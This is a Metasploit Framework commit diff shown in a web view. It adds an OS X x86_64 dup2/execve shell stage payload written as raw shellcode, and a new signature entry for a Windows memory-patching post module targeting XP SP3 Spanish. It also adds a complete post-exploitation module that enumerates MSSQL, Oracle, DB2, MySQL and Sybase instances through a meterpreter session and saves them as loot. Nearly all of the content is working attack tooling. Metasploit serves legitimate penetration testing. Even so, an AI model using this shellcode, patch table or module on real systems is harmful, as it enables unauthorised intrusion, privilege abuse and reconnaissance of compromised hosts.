|
|
||||||
|
def handle_intermediate_stage(conn, p)
|
||||||
|
#
|
||||||
|
# Our stager payload expects to see a next-stage length first.
|
||||||
|
#
|
||||||
|
conn.put([p.length].pack('V'))
|
||||||
|
end
|
||||||
|
end
|
|
@ -0,0 +1,38 @@
|
||||||
|
##
|
||||||
|
# This file is part of the Metasploit Framework and may be subject to
|
||||||
|
# redistribution and commercial restrictions. Please see the Metasploit
|
||||||
|
# web site for more information on licensing and terms of use.
|
||||||
|
# http://metasploit.com/
|
||||||
|
##
|
||||||
|
|
||||||
|
require 'msf/core'
|
||||||
|
require 'msf/base/sessions/command_shell'
|
||||||
|
require 'msf/base/sessions/command_shell_options'
|
||||||
|
|
||||||
|
module Metasploit3
|
||||||
|
|
||||||
|
include Msf::Sessions::CommandShellOptions
|
||||||
|
|
||||||
|
def initialize(info = {})
|
||||||
|
super(merge_info(info,
|
||||||
|
'Name' => 'OS X dup2 Command Shell',
|
||||||
|
'Version' => '$Revision$',
|
||||||
|
'Description' => 'dup2 socket in edi, then execve',
|
||||||
|
'Author' => 'nemo',
|
||||||
|
'License' => MSF_LICENSE,
|
||||||
|
'Platform' => 'osx',
|
||||||
|
'Arch' => ARCH_X86_64,
|
||||||
|
'Session' => Msf::Sessions::CommandShell,
|
||||||
|
'Stage' =>
|
||||||
|
{
|
||||||
|
'Payload' =>
|
||||||
|
"\xb8\x5a\x00\x00\x02\x48\x31\xf6\x0f\x05\xb8\x5a"+
|
||||||
|
"\x00\x00\x02\x48\xff\xc6\x0f\x05\x48\x31\xc0\xb8"+
|
||||||
|
"\x3b\x00\x00\x02\xe8\x08\x00\x00\x00\x2f\x62\x69"+
|
||||||
|
"\x6e\x2f\x73\x68\x00\x48\x8b\x3c\x24\x48\x31\xd2"+
|
||||||
|
"\x52\x57\x48\x89\xe6\x0f\x05"
|
||||||
|
}
|
||||||
|
))
|
||||||
|
end
|
||||||
|
|
||||||
|
end
|
|
@ -62,7 +62,8 @@ class Metasploit3 < Msf::Post
|
||||||
{ :sig => "8bff558bec81ec88000000a1", :sigoffset => 0xb76a, :orig_code => "32c0", :patch => "b001", :patchoffset => 0xb827, :os => /Windows Vista/ },
|
{ :sig => "8bff558bec81ec88000000a1", :sigoffset => 0xb76a, :orig_code => "32c0", :patch => "b001", :patchoffset => 0xb827, :os => /Windows Vista/ },
|
||||||
{ :sig => "8bff558bec81ec88000000a1", :sigoffset => 0xb391, :orig_code => "32c0", :patch => "b001", :patchoffset => 0xb44e, :os => /Windows Vista/ },
|
{ :sig => "8bff558bec81ec88000000a1", :sigoffset => 0xb391, :orig_code => "32c0", :patch => "b001", :patchoffset => 0xb44e, :os => /Windows Vista/ },
|
||||||
{ :sig => "8bff558bec81ec88000000a1", :sigoffset => 0xacf6, :orig_code => "32c0", :patch => "b001", :patchoffset => 0xadb3, :os => /Windows Vista/ },
|
{ :sig => "8bff558bec81ec88000000a1", :sigoffset => 0xacf6, :orig_code => "32c0", :patch => "b001", :patchoffset => 0xadb3, :os => /Windows Vista/ },
|
||||||
{ :sig => "8bff558bec81ec88000000a1", :sigoffset => 0xe881, :orig_code => "32c0", :patch => "b001", :patchoffset => 0xe93e, :os => /Windows 7/ }
|
{ :sig => "8bff558bec81ec88000000a1", :sigoffset => 0xe881, :orig_code => "32c0", :patch => "b001", :patchoffset => 0xe93e, :os => /Windows 7/ },
|
||||||
|
{ :sig => "8bff558bec83ec50a1", :sigoffset => 0x97d3, :orig_code => "32c0", :patch => "b001", :patchoffset => 0x9878, :os => /Windows XP.*Service Pack 3 - spanish/ }
|
||||||
]
|
]
|
||||||
|
|
||||||
unsupported if client.platform !~ /win32|win64/i
|
unsupported if client.platform !~ /win32|win64/i
|
||||||
|
|
|
@ -0,0 +1,339 @@
|
||||||
|
##
|
||||||
|
# ## This file is part of the Metasploit Framework and may be subject to
|
||||||
|
# redistribution and commercial restrictions. Please see the Metasploit
|
||||||
|
# web site for more information on licensing and terms of use.
|
||||||
|
# http://metasploit.com/
|
||||||
|
##
|
||||||
|
|
||||||
|
require 'rex'
|
||||||
|
require 'msf/core'
|
||||||
|
require 'msf/core/post/file'
|
||||||
|
require 'msf/core/post/common'
|
||||||
|
require 'msf/core/post/windows/registry'
|
||||||
|
|
||||||
|
class Metasploit3 < Msf::Post
|
||||||
|
|
||||||
|
include Msf::Post::File
|
||||||
|
include Msf::Post::Common
|
||||||
|
include Msf::Post::Windows::Registry
|
||||||
|
include Msf::Auxiliary::Report
|
||||||
|
|
||||||
|
def initialize(info={})
|
||||||
|
super( update_info( info,
|
||||||
|
'Name' => 'Windows Gather Database Instance Enumeration',
|
||||||
|
'Description' => %q{ This module will enumerate a windows system for installed database instances },
|
||||||
|
'License' => MSF_LICENSE,
|
||||||
|
'Author' => [
|
||||||
|
'Barry Shteiman <barry[at]sectorix.com>', # Module author
|
||||||
|
'juan vazquez' # minor help
|
||||||
|
],
|
||||||
|
'Platform' => [ 'windows' ],
|
||||||
|
'SessionTypes' => [ 'meterpreter' ]
|
||||||
|
))
|
||||||
|
end
|
||||||
|
|
||||||
|
# method called when command run is issued
|
||||||
|
def run
|
||||||
|
|
||||||
|
results = []
|
||||||
|
|
||||||
|
print_status("Enumerating Databases on #{sysinfo['Computer']}")
|
||||||
|
if check_mssql
|
||||||
|
results += enumerate_mssql
|
||||||
|
end
|
||||||
|
if check_oracle
|
||||||
|
results += enumerate_oracle
|
||||||
|
end
|
||||||
|
if check_db2
|
||||||
|
results += enumerate_db2
|
||||||
|
end
|
||||||
|
if check_mysql
|
||||||
|
results += enumerate_mysql
|
||||||
|
end
|
||||||
|
if check_sybase
|
||||||
|
results += enumerate_sybase
|
||||||
|
end
|
||||||
|
|
||||||
|
if results.empty?
|
||||||
|
print_status("Done, No Databases were found")
|
||||||
|
return
|
||||||
|
end
|
||||||
|
|
||||||
|
print_status("Done, Databases Found.")
|
||||||
|
|
||||||
|
tbl = Rex::Ui::Text::Table.new(
|
||||||
|
'Header' => "Installed Databases",
|
||||||
|
'Indent' => 1,
|
||||||
|
'Columns' =>
|
||||||
|
[
|
||||||
|
"Type",
|
||||||
|
"Instance",
|
||||||
|
"Database",
|
||||||
|
"Port"
|
||||||
|
])
|
||||||
|
|
||||||
|
results.each { |r|
|
||||||
|
report_service(:host => session.sock.peerhost, :port => r[3], :name => r[0], :info => "#{r[0]}, #{r[1]}")
|
||||||
|
tbl << r
|
||||||
|
}
|
||||||
|
|
||||||
|
print_line(tbl.to_s)
|
||||||
|
p = store_loot("host.databases", "text/plain", session, tbl.to_s, "databases.txt", "Running Databases")
|
||||||
|
print_status("Results stored in: #{p}")
|
||||||
|
|
||||||
|
end
|
||||||
|
|
||||||
|
##### initial identification methods #####
|
||||||
|
|
||||||
|
# method for Checking if database instances are installed on host - mssql
|
||||||
|
def check_mssql
|
||||||
|
key = "HKLM\\SOFTWARE\\Microsoft"
|
||||||
|
if registry_enumkeys(key).include?("Microsoft SQL Server")
|
||||||
|
print_status("\tMicrosoft SQL Server found.")
|
||||||
|
return true
|
||||||
|
end
|
||||||
|
return false
|
||||||
|
rescue
|
||||||
|
return false
|
||||||
|
end
|
||||||
|
|
||||||
|
# method for Checking if database instances are installed on host - oracle
|
||||||
|
def check_oracle
|
||||||
|
key = "HKLM\\SOFTWARE\\Oracle"
|
||||||
|
if registry_enumkeys(key).include?("ALL_HOMES")
|
||||||
|
print_status("\tOracle Server found.")
|
||||||
|
return true
|
||||||
|
elsif registry_enumkeys(key).include?("SYSMAN")
|
||||||
|
print_status("\tOracle Server found.")
|
||||||
|
return true
|
||||||
|
end
|
||||||
|
return false
|
||||||
|
rescue
|
||||||
|
return false
|
||||||
|
end
|
||||||
|
|
||||||
|
# method for Checking if database instances are installed on host - db2
|
||||||
|
def check_db2
|
||||||
|
key = "HKLM\\SOFTWARE\\IBM\\DB2"
|
||||||
|
if registry_enumkeys(key).include?("GLOBAL_PROFILE")
|
||||||
|
print_status("\tDB2 Server found.")
|
||||||
|
return true
|
||||||
|
end
|
||||||
|
return false
|
||||||
|
rescue
|
||||||
|
return false
|
||||||
|
end
|
||||||
|
|
||||||
|
# method for Checking if database instances are installed on host - mysql
|
||||||
|
def check_mysql
|
||||||
|
key = "HKLM\\SOFTWARE"
|
||||||
|
if registry_enumkeys(key).include?("MySQL AB")
|
||||||
|
print_status("\tMySQL Server found.")
|
||||||
|
return true
|
||||||
|
end
|
||||||
|
return false
|
||||||
|
rescue
|
||||||
|
return false
|
||||||
|
end
|
||||||
|
|
||||||
|
# method for Checking if database instances are installed on host - sybase
|
||||||
|
def check_sybase
|
||||||
|
key = "HKLM\\SOFTWARE\\Sybase"
|
||||||
|
if registry_enumkeys(key).include?("SQLServer")
|
||||||
|
print_status("\tSybase Server found.")
|
||||||
|
return true
|
||||||
|
elsif registry_enumkeys(key).include?("Server")
|
||||||
|
print_status("\tSybase Server found.")
|
||||||
|
return true
|
||||||
|
end
|
||||||
|
return false
|
||||||
|
rescue
|
||||||
|
return false
|
||||||
|
end
|
||||||
|
|
||||||
|
##### deep analysis methods #####
|
||||||
|
|
||||||
|
# method to identify mssql instances
|
||||||
|
def enumerate_mssql
|
||||||
|
results = []
|
||||||
|
key = "HKLM\\SOFTWARE\\Microsoft\\Microsoft SQL Server\\Instance Names\\SQL"
|
||||||
|
instances = registry_enumvals(key)
|
||||||
|
if not instances.nil? and not instances.empty?
|
||||||
|
instances.each do |i|
|
||||||
|
tcpkey = "HKLM\\SOFTWARE\\Microsoft\\Microsoft SQL Server\\#{registry_getvaldata(key,i)}\\MSSQLServer\\SuperSocketNetLib\\Tcp\\IPAll"
|
||||||
|
tcpport = registry_getvaldata(tcpkey,"TcpPort")
|
||||||
|
print_good("\t\t+ #{registry_getvaldata(key,i)} (Port:#{tcpport})")
|
||||||
|
results << ["mssql","instance:#{registry_getvaldata(key,i)} port:#{tcpport}","Microsoft SQL Server",tcpport]
|
||||||
|
end
|
||||||
|
end
|
||||||
|
return results
|
||||||
|
rescue
|
||||||
|
print_error("\t\t! could not identify information")
|
||||||
|
return results || []
|
||||||
|
end
|
||||||
|
|
||||||
|
# method to identify oracle instances
|
||||||
|
def enumerate_oracle
|
||||||
|
results = []
|
||||||
|
basekey = "HKLM\\SOFTWARE\\Oracle\\SYSMAN"
|
||||||
|
instances = registry_enumkeys(basekey)
|
||||||
|
if instances.nil? or instances.empty?
|
||||||
|
print_error("\t\t! Oracle instances not found")
|
||||||
|
return results
|
||||||
|
end
|
||||||
|
|
||||||
|
instances.each do |i|
|
||||||
|
key = "#{basekey}\\#{i}"
|
||||||
|
val_ORACLE_SID = registry_getvaldata(key,"ORACLE_SID")
|
||||||
|
val_ORACLE_HOME = registry_getvaldata(key,"ORACLE_HOME")
|
||||||
|
|
||||||
|
if not exist?(val_ORACLE_HOME + "\\NETWORK\\ADMIN\\tnsnames.ora")
|
||||||
|
print_error("\t\t! #{val_ORACLE_SID} (No Listener Found)")
|
||||||
|
next
|
||||||
|
end
|
||||||
|
|
||||||
|
data_TNSNAMES = read_file(val_ORACLE_HOME + "\\NETWORK\\ADMIN\\tnsnames.ora")
|
||||||
|
if data_TNSNAMES =~ /PORT\ \=\ (\d+)/
|
||||||
|
port = $1
|
||||||
|
print_good("\t\t+ #{val_ORACLE_SID} (Port:#{port})")
|
||||||
|
results << [ "oracle","instance:#{val_ORACLE_SID} port:#{port}","Oracle Database Server",port ]
|
||||||
|
else
|
||||||
|
print_error("\t\t! #{val_ORACLE_SID} (No Listener Found)")
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
return results
|
||||||
|
|
||||||
|
rescue
|
||||||
|
print_error("\t\t! could not identify information")
|
||||||
|
return results || []
|
||||||
|
end
|
||||||
|
|
||||||
|
# method to identify mysql instances
|
||||||
|
def enumerate_mysql
|
||||||
|
results = []
|
||||||
|
basekey = "HKLM\\SOFTWARE\\MySQL AB"
|
||||||
|
instances = registry_enumkeys(basekey)
|
||||||
|
if instances.nil? or instances.empty?
|
||||||
|
return results
|
||||||
|
end
|
||||||
|
instances.each do |i|
|
||||||
|
key = "#{basekey}\\#{i}"
|
||||||
|
val_location = registry_getvaldata(key,"Location")
|
||||||
|
|
||||||
|
data = find_mysql_conf(val_location)
|
||||||
|
|
||||||
|
if data and data =~ /port\=(\d+)/
|
||||||
|
port = $1
|
||||||
|
print_good("\t\t+ MYSQL (Port:#{port})")
|
||||||
|
results << ["mysql","instance:MYSQL port:#{port}","MySQL Server",port]
|
||||||
|
else
|
||||||
|
print_error("\t\t! could not identify information")
|
||||||
|
end
|
||||||
|
end
|
||||||
|
return results
|
||||||
|
rescue
|
||||||
|
print_error("\t\t! could not identify information")
|
||||||
|
return results || []
|
||||||
|
end
|
||||||
|
|
||||||
|
# method to identify sybase instances
|
||||||
|
def enumerate_sybase
|
||||||
|
basekey = "HKLM\\SOFTWARE\\Sybase\\SQLServer"
|
||||||
|
instance = registry_getvaldata(basekey,"DSLISTEN")
|
||||||
|
location = registry_getvaldata(basekey,"RootDir")
|
||||||
|
results = []
|
||||||
|
|
||||||
|
if not exist?(location + "\\ini\\sql.ini")
|
||||||
|
print_error("\t\t! could not locate configuration file.")
|
||||||
|
return results
|
||||||
|
end
|
||||||
|
|
||||||
|
data = read_file(location + "\\ini\\sql.ini")
|
||||||
|
if data =~ /\[#{instance}\]([^\[]*)/
|
||||||
|
segment = $1
|
||||||
|
else
|
||||||
|
print_error("\t\t! couldnt locate information.")
|
||||||
|
return results
|
||||||
|
end
|
||||||
|
|
||||||
|
if segment =~ /master\=\w+\,[^\,]+\,(\d+)/
|
||||||
|
port = $1
|
||||||
|
else
|
||||||
|
print_error("\t\t! couldnt locate information.")
|
||||||
|
return results
|
||||||
|
end
|
||||||
|
|
||||||
|
print_good("\t\t+ #{instance} (Port:#{port})")
|
||||||
|
results << [ "sybase","instance:#{instance} port:#{port}","Sybase SQL Server",port ]
|
||||||
|
return results
|
||||||
|
rescue
|
||||||
|
print_error("\t\t! couldnt locate information.")
|
||||||
|
return results || []
|
||||||
|
end
|
||||||
|
|
||||||
|
# method to identify db2 instances
|
||||||
|
def enumerate_db2
|
||||||
|
results = []
|
||||||
|
cmd_i = cmd_exec("db2cmd", "-i -w /c db2ilist")
|
||||||
|
cmd_p = cmd_exec("db2cmd", "-i -w /c db2 get dbm cfg")
|
||||||
|
if cmd_p =~ /\ ?TCP\/IP\ Service\ name[\ ]+\(SVCENAME\)\ =\ (\w+)/
|
||||||
|
port = $1
|
||||||
|
else
|
||||||
|
print_error("\t\t! could not identify instances information")
|
||||||
|
return results
|
||||||
|
end
|
||||||
|
|
||||||
|
windir = session.fs.file.expand_path("%windir%")
|
||||||
|
getfile = session.fs.file.search(windir + "\\system32\\drivers\\etc\\","services.*",recurse=true,timeout=-1)
|
||||||
|
|
||||||
|
data = nil
|
||||||
|
getfile.each do |file|
|
||||||
|
if exist?("#{file['path']}\\#{file['name']}")
|
||||||
|
data = read_file("#{file['path']}\\#{file['name']}")
|
||||||
|
break if not data.nil?
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
if data and data =~ /#{port}[\ \t]+(\d+)/
|
||||||
|
port_t = $1
|
||||||
|
else
|
||||||
|
print_error("\t\t! could not identify instances information")
|
||||||
|
return results
|
||||||
|
end
|
||||||
|
|
||||||
|
cmd_i.split("\n").compact.each do |line|
|
||||||
|
stripped=line.strip
|
||||||
|
print_good("\t\t+ #{stripped} (Port:#{port_t})")
|
||||||
|
results << [ "db2","instance:#{stripped} port:#{port_t}","DB2 Server",port_t ]
|
||||||
|
end
|
||||||
|
|
||||||
|
return results
|
||||||
|
|
||||||
|
rescue
|
||||||
|
print_error("\t\t! could not identify instances information")
|
||||||
|
return results || []
|
||||||
|
end
|
||||||
|
|
||||||
|
##### helper methods #####
|
||||||
|
|
||||||
|
def find_mysql_conf(val_location)
|
||||||
|
data = nil
|
||||||
|
if exist?(val_location + "\\my.ini")
|
||||||
|
data = read_file(val_Location + "\\my.ini")
|
||||||
|
elsif exist?(val_location + "\\my.cnf")
|
||||||
|
data = read_file(val_location + "\\my.cnf")
|
||||||
|
else
|
||||||
|
sysdriv=session.fs.file.expand_path("%SYSTEMDRIVE%")
|
||||||
|
getfile = session.fs.file.search(sysdriv + "\\","my.ini",recurse=true,timeout=-1)
|
||||||
|
getfile.each do |file|
|
||||||
|
if exist?("#{file['path']}\\#{file['name']}")
|
||||||
|
data = read_file("#{file['path']}\\#{file['name']}")
|
||||||
|
break
|
||||||
|
end
|
||||||
|
end
|
||||||
|
end
|
||||||
|
return data
|
||||||
|
end
|
||||||
|
|
||||||
|
end
|
Loading…
Reference in New Issue